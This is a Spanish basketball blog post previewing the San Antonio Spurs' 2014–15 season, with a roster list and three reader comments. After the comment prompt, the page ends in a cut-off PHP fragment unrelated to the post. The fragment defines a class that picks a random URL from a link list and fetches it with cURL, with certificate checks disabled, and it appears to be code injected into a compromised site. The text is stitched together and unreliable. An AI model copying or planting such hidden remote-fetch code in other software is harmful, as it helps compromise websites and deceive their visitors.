San Antonio Spurs: Carpe Diem

16 de October de 2014 por rumbero

Abran paso al campeón. Y no a uno cualquiera sino uno de los más brillantes que hayamos visto nunca. Ni los más viejos del lugar recuerdan un juego tan excelso y coral como el que mostraron los Spurs el año pasado, especialmente en la final ante los todopoderosos Heat. Una máquina casi perfecta que todo entrenador sueña con crear y que Popovich ha sabido materializar. Podrían no ganar un partido nunca más que la historia los seguiría situando en el olimpo de la NBA. Sin embargo, prácticamente ajenos a las alabanzas que despertó su juego año pasado, afrontarán la campaña con la mirada puesta en un sexto título. Mientras la liga se centra en el Love&James, los alley oops de Griffin o la vuelta de Kobe ellos se limitarán a esperar su momento, una vez más.

Movimientos clave

Sobre el papel no hay mejor notícia para los Spurs que seguir contando con el bloque que les hizo campeones. El único trabajo que han tenido durante el verano han sido las renovaciones de Patty Mills y Boris Diaw. El base australiano cuajó una gran temporada como suplente de Parker y aprovechó muy bien los partidos en los que el francés estuvo lesionado. Podría haber salido en busca de un buen contrato en la agencia libre pero una lesión en el hombro que lo mantendrá fuera de las pistas durante unos 7 meses le privó de la aventura y seguirá en la franquicia. El otro punto era asegurar la continuidad del francés Diaw, al que no podían dejar escapar de ninguna manera. Una pieza básica en el esquema de Pop que llegó incluso a sonar como posible MVP de las finales. No hay dudas sobre su rendimiento, sí sobre su peso. Por eso si es capaz de acabar la temporada sin ganar kilos se llevará 500.000 dólares más. Eres “grande” Boris. A los 14 magníficos habrá que añadir al rookie Kyle Anderson, al que muchos ya señalan como posible robo del draft. Estando los Spurs de por medio, no hay duda sobre eso.

Qué esperamos de ellos

Victorias y buen baloncesto. El cuento de “este equipo se hace viejo” ya no cuela. Si algo han demostrado los Spurs estos años es que el paso del tiempo no va con ellos. Por lo tanto hay que pensar que volverán a administrar minutos y esfuerzos como nadie durante la temporada regular sin que les cueste posiciones en el Oeste. A partir de ahí el único handicap con el que se pueden encontrar es la “autocomplacencia”. La temporada pasada jugaron los PO con el triple de Allen grabado a fuego en su cabeza. Saldada la deuda y con 5 títulos a sus espaldas, pueden encontrarse con otros equipos con mayor hambre de victoria que les compliquen un nuevo campeonato. Esto y las comparaciones que se van a hacer respecto a la temporada anterior si no consiguen encontrar esa excelencia en su juego pueden ser sus mayores problemas, aunque seguramente Pop sabrá tratar con la situación. A partir de aquí habrá que ver si jugadores como Leonard y Green ganan más peso dentro de la plantilla o Duncan nos sigue regalando dobles-dobles con 38 años, pero sobretodo vamos a disfrutar una vez más de estos tipos a los que algunos llevan tiempo enterrando, porque algún año será el último, pero no este.

Pronóstico

Sobre las 55 victorias. Entre los tres primeros del oeste

Plantilla

PG: Tony Parker, Patty Mills, Corey Joseph
SG: Danny Green, Manu Ginobili, Marco Bellineli
SF: Kawhi Leonard, Kyle Anderson, Austin Daye
PF: Tim Duncan, Boris Diaw, Matt Bonner
C: Tiago Splitter, Aaron Baynes, Jeff Ayres

Comenta

3 comentarios a esta entrada

  1. jmpa dice:
    #1

    Si alguien no lo ha visto ya, les recomiendo el video “The Beautiful Game” sobre los Spurs. En YouTube lo podéis encontrar fácilmente.

    Sobre Kyle Anderson se dice que tiene muy buena visión de juego y que puede ser perfectamente eso que llaman un Point-Forward, aunque también se argumenta que es lento.

      Citar

  2. Jose A. Ramírez dice:
    #2

    Nunca vi tal nivel de baloncesto en mi vida que lo de la temporada pasada, la excelencia es eso. Nada mas que añadir

      Citar

  3. TheDeerHunter dice:
    #3

    Qué decir de los Spurs que no se haya dicho ya…
    Bueno, que el amigo Rumbero ha roto la tradición de enterrarles en la previa. Mal presagio…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>